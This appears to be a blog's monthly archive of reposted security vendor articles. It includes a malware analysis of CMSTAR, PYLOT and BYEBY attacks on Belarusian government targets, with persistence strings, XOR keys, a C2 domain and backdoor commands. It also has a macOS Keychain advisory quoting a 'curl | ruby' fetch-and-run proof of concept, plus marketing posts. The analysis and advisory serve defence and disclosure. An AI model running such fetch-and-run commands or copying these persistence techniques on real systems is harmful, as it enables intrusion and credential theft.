Monthly Archives: September 2017

  • 0

Threat Actors Target Government of Belarus Using CMSTAR Trojan

Category : Trend Micro

Palo Alto Networks Unit 42 has identified a series of phishing emails containing updated versions of the previously discussed CMSTAR malware family targeting various government entities in the country of Belarus.

We first reported on CMSTAR in spear phishing attacks in spring of 2015and later in 2016.

In this latest campaign. we observed a total of 20 unique emails between June and August of this year that included two new variants of the CMSTAR Downloader. We also discovered two previously unknown payloads. These payloads contained backdoors that we have named BYEBY and PYLOT respectively.


Figure 1 Diagram of the attack sequence

Phishing Emails

Between June and August of this year, we observed a total of 20 unique emails being sent to the following email addresses:

Email Address Description[.]by Press Service of the Ministry of Defense of the Republic of Belarus[.]by Baranovichi Operational Management of the Armed Forces[.]by Ministry of Defense of the Republic of Belarus[.]by Ministry of Defense of the Republic of Belarus[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus[.]by Minsk Operational Administration of the Armed Forces[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus[.]by Unknown. Likely used by Ministry of Defense of the Republic of Belarus[.]by State Border Committee of the Republic of Belarus[.]by International Security and Arms Control Department, Ministry of Foreign Affairs
ablameiko@mia[.]by Unknown. Likely used by the Ministry of Internal Affairs of the Republic of Belarus


These emails contained a series of subject lines, primarily revolving around the topic of Запад-2017 (‘West-2017’), also known in English as Zapad 2017. Zapad 2017 was a series of joint military exercises conducted by the Armed Forces of the Russian Federation and the Republic of Belarus, held from September 14th to 20th in 2017.

The full list of subject lines is as follows:

  • Fwd:Подготовка к Запад-2017 [Translation: Fwd:Preparing for the West-2017]
  • выпуск воспитанников [Translation: graduation]
  • К Запад-2017 [Translation: To West-2017]
  • Запад-2017 [Translation: West-2017]

An example of some of the previously mentioned emails may be seen below.


Figure 2 Phishing email sent to Belarus government (1/2)


Figure 3 Phishing email sent to Belarus government (2/2)

Decoy Documents

We observed that the attachments used in these emails contained a mixture of file types. RTF documents, Microsoft Word documents, and a RAR archive. The RAR archive contained a series of images, a decoy document, and a Microsoft Windows executable within it. The executable has a .scr file extension, and is designed to look like a Windows folder, as seen below:


Figure 4 Payload disguising itself as a Microsoft Windows folder

The rough translation of the folder and file names above are ‘Preparations for large-scale West-2017 exercises in this format are being held for the first time.’ Within the actual folder, there are a series of JPG images, as well as a decoy document with a title that is translated to ‘Thousands of Russian and Belarusian military are involved in the training of the rear services.’


Figure 5 Embedded images and decoy document within RAR

The decoy document contains the following content:


Figure 6 Decoy document within RAR

The other RTF and Word documents used additional decoy documents, which can be seen below.


Figure 7 Decoy document with translation (1/2)


Figure 8 Decoy document with translation (2/2)

While we observed different techniques being used for delivery, all attachments executed a variant of the CMSTAR malware family. We observed minor changes between variants, which we discuss in the CMSTAR Variations and Payloads section of the blog post.

The Word documents, which we track as Werow, employ malicious macros for their delivery. More information about these macros may be found in the Appendix of the blog post. Additionally, we have included a script that extracts these embedded payloads that can also be found in the Appendix.

The RTF documents made use of CVE-2015-1641. This vulnerability, patched in 2015, allows attackers to execute malicious code when these specially crafted documents are opened within vulnerable instances of Microsoft Word. The payload for these samples is embedded within them and obfuscated using a 4-byte XOR key of 0xCAFEBABE. We have included a script that can be used to extract the underlying payload of these RTFs statically that can be found in the Appendix.

The SCR file mentioned previously drops a CMSTAR DLL and runs it via an external call to rundll32.exe.

CMSTAR Variations and Payloads

In total, we observed three variations of CMSTAR in these recent attacks against Belarusian targets. The biggest change observed between them looks to be minor modifications made to the string obfuscation routine. A very simple modification to the digit used in subtraction was modified between the variants, as shown below:


Figure 9 String obfuscation modifications between CMSTAR variants

The older variation, named CMSTAR.A, was discussed in a previous blog post entitled, “Digital Quartermaster Scenario Demonstrated in Attacks Against the Mongolian Government.”

The CMSTAR.B variant was witnessed using both a different mutex from CMSTAR.A, as well as a slightly modified string obfuscation routine. The mutexes used by CMSTAR ensure that only one instance of the malware runs at a time. The CMSTAR.C variant used the same mutex as CMSTAR.B, however, again used another slightly modified string obfuscation routine. We found all CMSTAR variants using the same obfuscation routine when I payload was downloaded from a remote server. We have included a tool to extract mutex and C2 information from all three CMSTAR variants, as well as a tool to decode the downloaded payload: both may be found in the Scripts section.

An example of CMSTAR downloading its payload may be found below:


Figure 10 Example HTTP download by CMSTAR

When expanding the research to identify additional CMSTAR.B and CMSTAR.C variants, we identified a total of 31 samples. Of these 31 samples, we found two unique payloads served from three of the C2 URLS—One of which was downloaded from a sample found in the phishing attacks previously described. Both payloads contained previously unknown malware families. We have named the payload found in the email campaign PYLOT, and the malware downloaded from the additional CMSTAR samples BYEBY.

Both malware families acted as backdoors, allowing the attackers to execute commands on the victim machine, as well as a series of other functions. More information about these individual malware families may be found in the appendix.


During the course of this research, we identified a phishing campaign consisting of 20 unique emails targeting the government of Belarus. The ploys used in these email and decoy documents revolved around a joint strategic military exercise of the Armed Forces of the Russian Federation and the Republic of Belarus, which took place between September 14th and September 20th of this year. While looking at the emails in question, we observed two new variants of the CMSTAR malware family. Between the samples identified and others we found while expanding our research scope, we identified two previously unknown malware families.

Palo Alto customers are protected from this threat in the following ways:

  • Tags have been created in AutoFocus to track CMSTARBYEBY, and PYLOT
  • All observed samples are identified as malicious in WildFire
  • Domains observed to act as C2s have been flagged as malicious
  • Traps 4.1 identifies and blocks the CVE-2015-1641 exploit used in these documents
  • Traps 4.1 blocks the macros used in the malicious Word documents

A special thanks to Tom Lancaster for his assistance on this research.


Werow Macro Analysis

The attacker used the same macro dropper all of the observed Microsoft Word documents we analyzed for this campaign. It begins by building the following path strings:

  • %APPDATA%\d.doc
  • %APPDATA%\Microsoft\Office\WinCred.acl

The ‘d.doc’ path will be used to store a copy of the Word document, while the ‘WinCred.acl’ will contain the dropped payload, which is expected to be a DLL.


Figure 11 Macro used to drop CMSTAR

Werow uses rudimentary obfuscation to hide and re-assemble the following strings:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WinCred
  • rundll32 %APPDATA%\Microsof\Office\WinCred.acl ,WinCred

These strings will be used at the end of the macro’s execution to ensure persistence via the Run registry key.

The malware proceeds to read an included overlay within the original Word document from a given offset. This data is decoded using and XOR operation, as well as an addition operation. It can be represented in Python as follows:

Once this overlay is decoded, it is written to the ‘WinCred.acl’ file and loaded with the ‘WinCred’ export. A script has been provided in the Scripts section that, in conjunction with oletools, can statically extract the embedded DLL payload from these documents.

RTF Shellcode Analysis

The RTF documents delivered in this attack campaign appear to be created by the same builder. All of the RTF files attempt to exploit CVE-2015-1641 to execute shellcode on the targeted system. Please reference for more information.

The shellcode executed after successful exploitation begins by resolving the API functions it requires by enumerating the API functions within loaded modules in the current process. It then builds the following list of values:


The shellcode then enumerates the API functions, subjects them to a ROR7 hashing routine and XORs the resulting hash with 0x10ADBEEF. It uses the result of this arithmetic to compare with the list of values above to find the API functions it requires to carry out its functionality.

1a22f51 110f91be WinExec
741f8dc4 64b2332b WriteFile
94e43293 84498c7c CreateFileA
daa7fe52 ca0a40bd UnmapViewOfFile
dbacbe43 cb0100ac SetFilePointer
ec496a9e fce4d471 GetEnvironmentVariableA
ff0d6657 efa0d8b8 CloseHandle

After resolving the API functions, the shellcode then begins searching for the embedded payload and decoy within the initial RTF file. It does so by searching the RTF file for three delimiters, specifically 0xBABABABABABA, 0xBBBBBBBB and 0xBCBCBCBC, which the shellcode uses to find the encrypted payload and decoy. The shellcode then decrypts the payload by XOR’ing four bytes at at time with the key 0xCAFEBABE, and decrypts the decoy by XOR’ing four bytes at a time using the key 0xBAADF00D. Here is a visual representation of the delimiters and embedded files:


After decrypting the payload, it saves the file to the following location:


The shellcode then creates the following registry key to automatically run the payload each time the system starts:

Software\Microsoft\Windows\CurrentVersion\Run : Microsoft

The shellcode saves the following command to this autorun key, which will execute the OutL12.pip payload, specifically calling its ‘WinCred’ exported function:


The shellcode will then overwrite the original delivery document with the decrypted decoy contents and open the new document.

PYLOT Analysis

This malware family was named via a combination of the DLLs original name of ‘pilot.dll’, along with the fact it downloads files with a Python (.py) file extension.

PYLOT begins by being loaded as a DLL with the ServiceMain export. It proceeds to create the following two folders within the %TEMP% path:

  • KB287640
  • KB887209

PYLOT continues to load and decode an embedded resource file. This file contains configuration information that is used by the malware throughout its execution. The following script, written in Python, may be used to decode this embedded resource object:

Looking at the decoded data, we see the following:


Figure 12 Decoded embedded configuration information

The malware continues to collect the following information from the victim computer:

  • Computer name
  • IP addresses present on the machine
  • MAC addresses
  • Microsoft Windows version information
  • Windows code page identifier information

This information is used to generate a unique hash for the victim machine. PYLOT then begins entering its C2 handler routine, where it will use HTTP for communication with the remote host.

Data sent to the remote C2 server is encrypted using RC4 with the previously shown key of ‘BBidRotnqQpHfpRTi8cR.’ It is then further obfuscated by base64-encoding this encrypted string. An example of this HTTP request containing this data can be seen below.



Figure 13 HTTP request made by PYLOT to remote server

The decrypted data sent in the request above is as follows. Note that all of this custom data format has not been fully identified, however, we’re able to see various strings, including the embedded configuration string of ‘fGAka0001’, as well as the victim hash of ‘100048048.’


Figure 14 Decrypted data sent by PYLOT to remote server

The base64-encoded string at the end of the data contains the collected victim machine information from earlier, separated by a ‘|’ delimiter.

The remote C2 server responds using the same data format. An example response can be seen below.


Figure 15 Response from remote C2 server

The decoded data at the end of the response contains various URIs to be used by the malware to receive commands, as well as other information that has yet to be fully researched.

A number of commands have been identified within PYLOT, including the following:
• Download batch script
• Run batch script
• Delete file
• Rename file
• Execute file
• Download file
• Upload file

BYEBY Analysis

BYEBY was named based on a string within the malware itself. Most strings found within this malware are concatenated to 6 characters. One such example was an instance where a debug string contained ‘BYE BY’, which was likely a concatenated form of the phrase ‘BYE BYE’.

This malware is loaded as a DLL, with an export name of ServiceMain. When the malware is initially loaded, it begins by checking to see if it is running within either of the following paths:

  • [SYSTEM32]\svchost.exe
  • [SYSTEM32]\rundll32.exe

If it finds itself not running in either location, it will immediately exit. This is likely a technique used to bypass various sandboxing systems. Should it find itself running as svchost.exe, it will write the current timestamp and a value of ‘V09SS010’ (Base64 Decoded: ‘WORKMN’) to a file named ‘’ within the user’s local %TEMP% folder. This file acts as a lot file and is written to frequently throughout the malware’s execution.

When the malware runs within the context of svchost.exe, it bypasses the installation routines and immediately enters the C2 handler.

When BYEBY is run within the context of rundll32.exe, it expects itself to be running for the first time. As such, it will register itself as a service with a name of ‘VideoSrv.’ After this service is created, BYEBY proceeds to enter it’s C2 handler function in a new thread.

BYEBY uses TLS for network communication, connecting to the following host on port 443:

  • oeiowidfla22[.]com

After the initial connection is established, BYEBY will collect the following system information and upload it to the remote C2:

  • Hostname
  • IP Address
  • Embedded String of ‘WinVideo’
  • Major Windows Version
  • Minor Windows Version
  • Embedded String of ‘6.1.7603.16000’

The malware is configured to accept a number of commands. These appear to be Base64-encoded strings that, when decoded, provide their true meaning. Only the beginning of the commands are checked. The Base64-decoded strings have been included for the benefit of the reader.

  • aGVsbG8h [Decoded: hello!]
  • R09PREJZ [Decoded: GOODBY]
  • TElTVCBE [Decoded: LIST D]
  • U1RBUlRD [Decoded: STARTC]
  • Q09NTUFO [Decoded: COMMAN]
  • VFJBTlNG [Decoded: TRANSF]
  • RVhFQ1VU [Decoded: EXECUT]

A mapping of commands and their descriptions has been provided:

Command Description
aGVsbG8h Authenticate with the remote C2 server.
R09PREJZ Close socket connection with remote server.
TElTVCBE List drives on the victim machine.
U1RBUlRD Start an interactive shell on the victim machine.
Q09NTUFO Execute a command in the interactive shell
VFJBTlNG Upload or download files to the victim machine.
RVhFQ1VU Execute command in a new process.


We created multiple scripts during the course of our research. We are sharing them here to assist other researchers or defenders that encounter this malware. – Script to extract the embedded CMSTAR payload from Word documents.– Script to extract the embedded CMSTAR payload from RTFs. – Script to identify possible mutex and C2 strings from CMSTAR variants. – Script to decode a payload downloaded by CMSTAR.

Indicators of Compromise

CMSTAR Variants Identified in Phishing Campaign

















CMSTAR Download Locations in Phishing Campaign

























CMSTAR.B Download Locations

















CMSTAR.C Download Locations




  • 0

macOS Keychain Security, What You Need To Know

Category : Rapid7

If you follow the infosec twitterverse or have been keeping an eye on macOS news sites, you’ve likely seen a tweet (with accompanying video) from Patrick Wardle (@patrickwardle) that purports to demonstrate dumping and exfiltration of something called the “keychain” without an associated privilege escalation prompt. Patrick also has a more in-depth Q&A blog post about the vulnerability.

Let’s pull back a bit to provide sufficient background on why you should be concerned.

What is the macOS Keychain?

Without going into fine-grained detail, the macOS Keychain is a secure password management system developed by Apple. It’s been around a while (back when capital letters ruled the day in “Mac OS”) and can hold virtually anything. It’s used to store website passwords, network share credentials, passphrases for wireless networks, and encrypted disk images; you can even use it to store notes securely.

A more “TL;DR” version of that is “The macOS Keychain likely has the passwords to all your email, social media, banking and other websites—as well as for local network shares and your WiFi.”

Most users access Keychain data through applications, but you can use the Keychain Access GUI utility to add, change, or delete entries. Here’s a sample dialog containing credentials for a fake application called (unimaginatively enough) “forexample”:

The password is not displayed by default. You need tick the “Show
password:” box and a prompt will appear:

Enter your system password and you’ll see the password:

That’s a central part of the Keychain — you provide authority for
accessing Keychain elements, even to the application that maintains the secrets for you.

Apple has also provided command-line access to work with the keychain via the security command. Here’s what the listing looks like for this example:

$ security find-generic-password -s forexample
keychain: "/Users/me/Library/Keychains/login.keychain-db"
version: 512
class: "genp"
    0x00000007 <blob>="forexample"
    0x00000008 <blob>=<NULL>
    "cdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"
    "mdat"<timedate>=0x32303137303932363230313035305A00  "20170926201050Z\000"

Again, the secret data is not visible.

As you may have surmised, Apple also provides programmatic access to the Keychain.

iOS, tvOS (etc) all use a similar keychain for storing secrets.

Before we jump into the news from September 25th, 2017, let’s fire up Apple’s Time Machine and go back about four years…

A (Very) Brief History of Keyjacking

Rapid7’s own Erran Carey put
together a proof-of-concept for “keyjacking” your Keychain a little over four years ago.

If you run:

curl -L | ruby

You’ll get prompted to unlock the keychain:

which will enable the Ruby script to decrypt all the secrets.

There’s another related, older vulnerability that involved using a bit more AppleScript to trick the system into allowing unfettered access to Keychain data (that vulnerability no
longer exists).

So, What’s Different Now?

Patrick’s video shows him running an unsigned application that was
downloaded from a remote source. The usual macOS prompts come up to warn you that running said apps is a bad idea and when you enable execution a dialog come up with a button. The user in the video (presumably Patrick) presses said button and some time passes, then a file with a full, cleartext export of the entire Keychain is scrolled through.

As indicated, many bad things had to happen before the secrets were revealed:

  • the Security System Preferences had to be modified to allow you to run unsigned third-party apps on your system
  • you had to download a program from some site or load/run it from USB (et al) drive
  • you had to say “OK” one more time to Apple’s warning that what you are about to do is a bad idea

Sure, registered/signed apps could perform the same malicious function,
but that’s less likely since Apple can tie the signed app to the
developer (or developer’s system) that created it.

What Can I Do?

It looks like this vulnerability has been around for a while. macOS Sierra and the just-released High Sierra are both vulnerable to this attack; El Capitan is also reported to be vulnerable.

Since you’re likely running El Capitan or Sierra, upgrading to High Sierra isn’t going to put you further at risk. In fact, High Sierra includes security patches and additional security features that make it worth the upgrade. Bottom line: don’t let this vulnerability alone prevent you from upgrading to High Sierra if you’re on El Capitan or Sierra. However, you might want to consider a completely fresh install versus an upgrade. Why? Read on!

macOS “power users” will not like the following advice, but you should consider performing a fresh install of High Sierra and starting from a completely fresh system, then migrating signed applications and data over. It’s the next bit that really hurts, though. Don’t install any unsigned third-party apps or any apps via MacPorts or Homebrew until Apple patches the vulnerability. Why? Well, there’s a chance Patrick is not the only one who found this vulnerability, and attackers may try to work up their own exploits before Apple has a chance to release a fix. In fact, they may already have (which is one reason we suggested not just doing an upgrade).

And, Apple is working on a fix — Patrick responsibly informed them — but there was no time to bake it in beforethis week’s official release. Using any unsigned third-party code could put your secrets at risk.You should also be wary of running signed code that you download outside the Mac App Store. Apple’s gatekeeping is not perfect, but it’s better than the total absence of gatekeeping that comes with downloads from uncontrolled websites.

Rapid7 researchers will be monitoring for other proof-of-concept (PoC) code that exploits this vulnerability (Patrick did not release his PoC code into the wild) and will be waiting and watching for Apple’s first macOS patch release — they released 10.13.1 betas to developers today — to fix this critical issue.


Author: Bob Rudis

  • 0

Extend Cloud Resources to the Azure-Ready Edge

Category : Riverbed

Riverbed has long been optimizing application delivery over any distance to remote locations for over 15 years. We know that these remote and branch offices (ROBOs) are the engines that drive the organizations, however maintaining a mix of cloud-based, and on-prem infrastructure to deliver applications and data has stretched IT resources to keep up with the demands of the business. Recent research from ESG indicates that over 91% of IT professionals say that incorporating cloud-based applications into their portfolio of corporate applications has increased the complexityassociated with managing ROBOs.

Sneak preview of Azure-Ready Edge at Microsoft Ignite 2017….

In partnership with Microsoft, Riverbed will introduce the Azure Ready Edge in early 2018 to address these challenges for IT Leaders. The solution extends the benefits of Azure cloud storage to edge sites by delivering flexible, secure, and anytime/anywhere application access to augment or completely eliminate traditional data center infrastructure.


Please come visit the Riverbed booth (#709) at Microsoft Ignite for a demo preview of this game changing solution. We will showcase the following:

  • The simplicity of Azure-to-edge operations with Hyper-V based VMs and Azure storage instantly provisioned to any site
  • Instant site or data recovery in the Azure cloud to any edge site
  • Enhanced orchestration workflow to manage multiple environments

The Riverbed SteelFusion solution has already made the concept of Zero Edge IT a reality for over 1200 enterprises with traditional data center or hybrid cloud environments. In 2014 when we introduced SteelFusion, we likened it a smartphone where all your productivity apps, contacts, personal data are consolidated in the cloud. There’s no need for a backpack full of servers and storage that you’d have to tote around wherever you went. This concept applies even more so today with Edge Computing gaining momentum as the preferred operational model for more organizations. The Azure-Ready Edge will be the ideal solution for this shift.





  • 0

Machine Learning for Threat Detection, Hype vs. Reality

Category : Trend Micro

Thursday, October 5, 2017,  1:00 p.m. EDT
Machine learning is an important technique being leveraged to improve ransomware detection rates. Register to join us for this live webinar.
You’ll hear from Eric Skinner, VP of Market Strategy, as he outlines why machine learning is effective relative to other techniques, but also how to mitigate its main weakness, false positives. You’ll also learn how malware authors are reacting to the rise of machine learning and how defenses will evolve next.

  • 0

The Attack on Enterprises for PII and The Need for User Behavior Analytics (UBA)

Category : HP Security

Information is the key. Information is what executives, employees, buyers, sellers, competition, and partners are in search of. Hackers are also in search of this same information and more. The information for individuals and enterprises is at the center of every business and security division worldwide.  The protection of this information is key.  The personally identifiable information (PII) companies have for their customers, clients, employees, and transactions is extremely valuable.  The cyber-attack and cybercrime statistics are across the news:

The steps to protect PII within organizations and to be aware of the possibility of insider leaks is at the forefront of security operations (SecOps) and security operations centers (SOC) globally.  The focus of cybercrime has begun its shift away from vulnerabilities within hardware and software and has shifted to focusing on people.  Malware, phishing attacks, ransomware and other methods have become the central focus for hackers and the “bad guys”.  There is also a threat of irregular behavior by employees that can lead to the release of PII, credentials, critical company information and resources.  Companies and SecOps teams need to strengthen their stance on these threats which affect their enterprise as much, if not more, than external attacks.

User Behavior Analytics.jpg

As a solution to internal security concerns and threats of the release of information, enterprises have begun to employ security information and event management (SIEM) and user behavior analytics (UBA) solutions within their environment. SIEM solutions allow organizations to detect known threats from threat intelligence collected and implemented into the environment.  UBA solutions allow organizations to track inside behavior activity through key machine learning to identify data leaks, account compromise, or insider abuse.  Through the detection of anomalies by inside behavior companies are able to stay ahead of potential breaches.

Another critical factor to the protection of PII for companies is the increase in remote workers.  Remote workers are more prevalent as companies grow and expand their presence and these workers often time utilize non-traditional methods for accessing company resources.  Through UBA, companies are able to monitor worker activity, patterns, and behavior to ensure security throughout their environment.

Protecting PII for internal use, customers, and clients is of the utmost important for enterprises.  Implementing intelligent solutions with adaptability, analytical capabilities, and customization allow organizations to protect themselves from known threats outside of the environment and also protect themselves from insider threats by employees and resources.

ArcSight Enterprise Security Manager (ESM)

ArcSight Enterprise Security Manager is a comprehensive real-time threat detection, analysis, workflow, and compliance management platform with increased data enrichment capabilities. ArcSight detects and directs analysts to cyber-security threats, in real time, helping SecOps teams respond quickly to indicators of compromise.  By automatically identifying and prioritizing threats, teams avoid the cost, complexity and extra work associated with being alerted of false positives. ESM allows SecOps organizations the ability to have a centralized, powerful view into their multiple environments creating workflow efficiency for streamlined processes.  Through improved detection, real-time correlation, and workflow automation, SOC teams can resolve incidents quickly and accurately.

ArcSight User Behavior Analytics (UBA)

ArcSight analytics solutions enable enterprises to detect advanced cyberattacks in real-time, giving security teams the insights needed to investigate and remediate threats quickly. Working symbiotically with SIEM technology, our solutions analyze and correlate every event across your IT environment, prioritize the highest risks, and display the resulting data in a customizable dashboard. An advanced analytics solution giving enterprises visibility into their users, network, data, and applications. ArcSight Analytics makes it much easier to gain information and anticipate, recognize, and mitigate threats.

For more information on SIEM award-winning ArcSight ESM, please visit:

For more information on ArcSight User Behavior Analytics, please visit:


Author: Ray McKenzie

  • 0

Building a Security Risk Management Program

Category : Imperva

The frequency of data breaches today highlights the need to peel back the onion on security programs and identify a laser-focused mission and ultimate goal. As a compliance manager, I know the horror stories first hand.

Let’s take a deeper dive into security and risk management basics to enable your program to add value for your business and help prevent breaches.

Security Risk Management Foundations

It all starts with a fundamental management-supported, skilled and budgeted security program.  Security programs are not a cut and paste of your neighbors’ security program.  Each program is unique, and must be tailored to your organization and its risks, forming an integral component of an enterprise risk management (ERM) program.

The goal is to identify areas of risk to the organization, its people, processes, technology and environment, and to drive management to implement controls to limit the exposure.  This, like any risk program, plays a trifecta balancing game between the risk, cost and benefit.

How ISO 27001 Can Help

The ISO 27001 jump starts a program by providing a well-structured framework for developing an Information Security Management System (ISMS), driven by solid corporate requirements (see Figure 1).  The ISO 27001 contains the key areas required by a security program, in addition to the details that are required within each area.  Well accepted internationally, it helps satisfy customer requests for solid security programs—and future certification (if this is your goal).

security risk drivers

Figure 1: Corporate risk drivers help determine the requirements for your security risk management program.

Knowing your organization carries a huge advantage over others and includes the people, the culture, the IT infrastructure, the assets…you may even know the regulatory and legal requirements for information security.  Knowing the processes, how things work (or how you think they do) is a big advantage, but this is only the beginning.

Meetings with key management and teams across the organization solidify connections and generate a detailed picture of the organization, risk status and controls across existing processes.  The data collected, once analyzed, provides input into the ISMS program, including: assets, risk owners, control owners, risks, and more.  You will find that time brings success if you stay engaged in the process.

I have found that employees/consultants, not spending 100% of their time involved in the ISMS, provide limited value to a continuous risk program, unless the organization is very small.  Business is constantly changing and along with it the risks.  Not being in the “zone” constantly depletes the value of your risk program. So, where to from here….

Identify Your Assets / Ask the Right Questions

Breached organizations might ask these questions:

  • Did we focus on ‘the gold’? — or assets, as we like to call them in the info security world — such as customer credit card numbers and biometric data
  • Did we fully understand the threats and risks to the business?
  • Was management made aware of the output of the above (if any)?

Risk management is there to ultimately protect an organizations’ key assets. So, start identifying them.  Assets include information, processes, systems, infrastructure and people in the organization.

A significant impact to any of these can affect the core business and ultimately management’s core objectives.  Threats are not only IT’s! …threats take advantage of vulnerabilities in any area of the business (Figure 2).

layered security

Figure 2: Layered security is key. Threats take advantage of vulnerabilities in any area of the business.

Start by asking:

  • What are my most sensitive assets?
  • What are my areas of highest risk to them?
  • How are we protecting those assets? – THINK!!! People, Process, Technology and Physical
  • Does that approach make sense?
  • What risk (residual risk) remains and is that acceptable to management?

Following these fundamental questions and making decisions leads to building a security risk program.  Outlined below are solid building blocks for a program, with a focus on three key areas.

Building the Protection Program

ISO 27002

The first makes use of the ISO 27002standard controls, to focus on the relevant business areas and their baseline implementation guidelines.  With over 100 controls outlined in detail, this provides an excellent starting point.


This is a tough one, but to establish a solid program requires documentation that aligns with the business processes, and is reviewed and approved by management.  There are three main reasons why documentation helps build integrated security controls (and why not to include it as an add on):

  • Gaining clarity of the actual processes
  • Officially assigning the control owners responsibility to perform the process and related controls, as outlined
  • Management review and approval of the new processes, generating commitment to the process via responsibility

NOTE: Generic purchased or provided documents are a great start, but unless tailored to your organization they do not serve for much.  Refer to the ISO 27001, for more details on the documentation process.

Team Effort

One cannot work in isolation when building the ISMS program.  You need a team effort and to rely on other risk-focused business areas of the organization similar to yours.  Your risk buddies include legal, IT and finance. There may be other risk partners, depending on the size of your organization.  The help of experienced internal or external assessors is an integral part of the team and enables one to perform technical assessments, audits and reviews to identify gaps and where threats can claim a victory.

Be Kind, Tough and Smart

Info security professionals must be kind, tough and smart (in no specific order). When building the security risk program many look at us—the auditor or compliance manager—as the enemy (or worse!). But like any good relationship, you must appreciate what each other brings to the table—understand each person has their own responsibilities and unique challenges in performing their job for the organization.

As the security SME, you will often need to stand your ground on matters of security recommendations and best practices, but strive to do so in a matter-of-fact way.  Once the security program begins to show value to the business and stakeholders, any adversarial feelings usually start to change. This is not an overnight reaction and may take dedication and focus—and as the subject matter expert, one helping them to manage their risks so they stay out of trouble.

Your smarts will help you shine: you will begin to gain the compliance managers’ trust; help keep them honest; and reduce the threats and business risks, which is the ultimate goal. In some cases, you will help to support their budget requests for resources, additional infrastructure, and more.

Useful Resources

Hopefully these tips prove helpful as you build out a security program and work with internal stakeholders and compliance team members. Below you’ll find links to additional information that could be useful.

ISO 31000 Risk Management

COSO Enterprise Risk Management



Author: David Lewis


  • 0

The new McAfee Is Extending Our Stride

Category : Uncategorized

With McAfee’s spin-off from Intel completed, our focus has turned to growing the business. Our commitment to the strategy articulated more than two years ago remains unchanged. We are determined to deliver an increasingly integrated solution, to deliver on our product roadmap, and to work with both competitors and partners. We are making great progress toward those objectives.

In June, the WannaCry and Petya attacks struck, creating a firestorm of publicity and disrupting business operations around the globe. Among other things, they exposed the continued use of old and unsupported operating systems in critical areas and they laid bare the lax patch-update processes followed by some businesses. These attacks remind us that the best protection is defense in depth, including zero-day protection to not just block but quickly learn about attacks to improve responses. The lead Key Topic in this threats report analyzes WannaCry and its business impact.

McAfee Quarterly Threats Sept-2017


  • 0

How to Uncover New Savings with Infrastructure Analytics

Category : NetApp

Business-level metadata is absolutely critical for controlling costs and deriving greater value from your IT infrastructure. For example, knowing that a certain storage system can provide the equivalent of $1 million worth of capacity isn’t particularly useful to anyone. However, if you can allocate and attribute that capacity down to the level of business units, users, or even individual developers, it creates awareness of where and how resources are being used. If you see that a business unit that isn’t contributing much to the bottom line is consuming more than its fair share of IT resources, someone in your company is likely to care about that. Ideally, you need to be able to tie every piece of physical infrastructure back to the activities of those who are using it, and at a granular level.

In a previous post, I discussed about how OnCommand Insight (OCI) delivers business insights and control to help facilitate process-based automation. This time I want to show how OCI delivers business-level metadata that is helping customers enable new operating models and control costs.

Creative Cost Reporting Can Change Bad Behavior

Showback reporting has been a bit of a failure in many organizations. When a showback report arrives at the end of the month, it might show that a user or business unit asked for a certain number of virtual machines and that each of them cost $1,000. However, this type of reporting is often viewed as “funny money” that is used only for internal bookkeeping. When the people consuming the resources have no incentive to change their behavior, it remains business as usual.

This is where the idea of “shameback” reporting comes in. NetApp customers have used OCI to implement these types of cost awareness reports after they discovered that showback alone was not enough to change behavior. Instead of just providing a list of resources with a cost allocated to each resource, a shameback approach shows the delta between the resources requested by a user or business unit and the actual level of usage, along with a ranking of the worst offenders. For example, if a business unit requests a platinum VM, but could have satisfied its workload with a bronze VM, a shameback report created using OCI makes this difference clear for everyone to see.

A creative approach to cost reporting can lead individuals to change their behavior. No one wants to be at the top of the report, so they learn to become more intelligent about the resources they request. When applied across a large organization, this type of reporting can lead to better resource utilization and big savings.

Cost Awareness Dashboard Example

Smart Metering Increases Utilization Rates

A customer I work with in the UK recently noticed that the usage of AWS cloud services was growing rapidly, while the demand for internal IT resources was falling. It is a development-heavy operation, and a lot of developers were going to AWS, buying VMs to support a project, putting it on their company credit cards, and claiming it as an expense. That approach created a problem for the IT team, because they were losing customers to the cloud. It was also a potentially ticking time bomb for the offending business units with regard to compliance, security, and unanticipated costs. When you have no idea where your data is, you have no way of knowing how much this type of “shadow IT” activity is costing.

In this case, the IT team wasn’t competing with AWS on price or capabilities. It all came down to flexibility and agility. To help address this problem, we created a billing system for the customer that was essentially a phone bill for IT. It showed daily storage charges in GB/hour and hourly VM, CPU, and memory costs. Each report used a similar template, and charges for CPU, memory, and storage resources were tied back to the developers in various development teams across the different business units.

For this customer, the next step in attacking the situation is likely to be smart metering. Here in the UK, a nationwide energy plan called Economy 7 is one example of how smart metering can be used to change behavior. The plan prices electricity rates cheaper at night, when demand is low, to encourage customers to shift their usage to off hours. Data center operators often find themselves in a similar situation, with excess capacity at night, or whenever the off-peak period falls for their operation.

By offering customers—whether internal or external—price incentives to run workloads during off hours, you not only gain an opportunity to win back or keep customers, but you can also accommodate more data center activity without having to build out new capacity, add infrastructure, buy additional virtualization licenses, and so on. It’s kind of a win-win for IT. Of course, this scenario only works if you have access to analytics that allow you to track usage at fine granularity. OCI provides this granular view into infrastructure utilization.

Make Your Business More Competitive

It’s difficult to compete with hyperscale cloud providers on the perceived cost of providing IT infrastructure services, but you can compete by offering flexible consumption and pricing options tailored to meet the needs of the business. OCI provides data insights that allow you to implement new operating models to control costs and increase the perceived value of your IT services, while helping to discourage shadow IT.

More Information

Discover how NetApp customers are benefiting from infrastructure analytics in these blog posts and by attending the NetApp Insight conference:


Author: Joshua Moore

  • 0

Six Steps to Finding Honey in the OWASP

Category : F5

According to Verizon’s 2014 Data Breach Investigations Report,1 “Web applications remain the proverbial punching bag of the Internet.”2 Things haven’t improved much since then.

What is it about web applications that makes them so precarious? There are three primary answers. First, since most web applications are configured or coded specifically for the organizations they serve, they are more unique than commercial off-the-shelf software, which is often rigorously tested to a wide marketplace. Because of this uniqueness, developers must pay extra attention to each application in order to find and eliminate security problems.

Second, most web applications are available to the entire Internet, which means anyone, at any time, can poke and pry to try to break them. There are nearly 4 billion people on the Internet, and most of them primarily use the web.3 That doesn’t count enormous numbers of bots trawling the web every day; some say there are more bots than humans viewing sites.4 If you have a website, someone—or something—is looking at it.

Third, the World Wide Web itself was never designed with robust security features. HTTP, the protocol underlying all web traffic, is stateless, meaning each request for data between client and server is independent of all previous requests. Add-on protocols and tools such as web cookies and session management trackers are needed to maintain consistency from when users first authenticate until they retrieve data.5 As with all add-on tools, these are less than ideal solutions and can introduce gaps in coverage and capability.

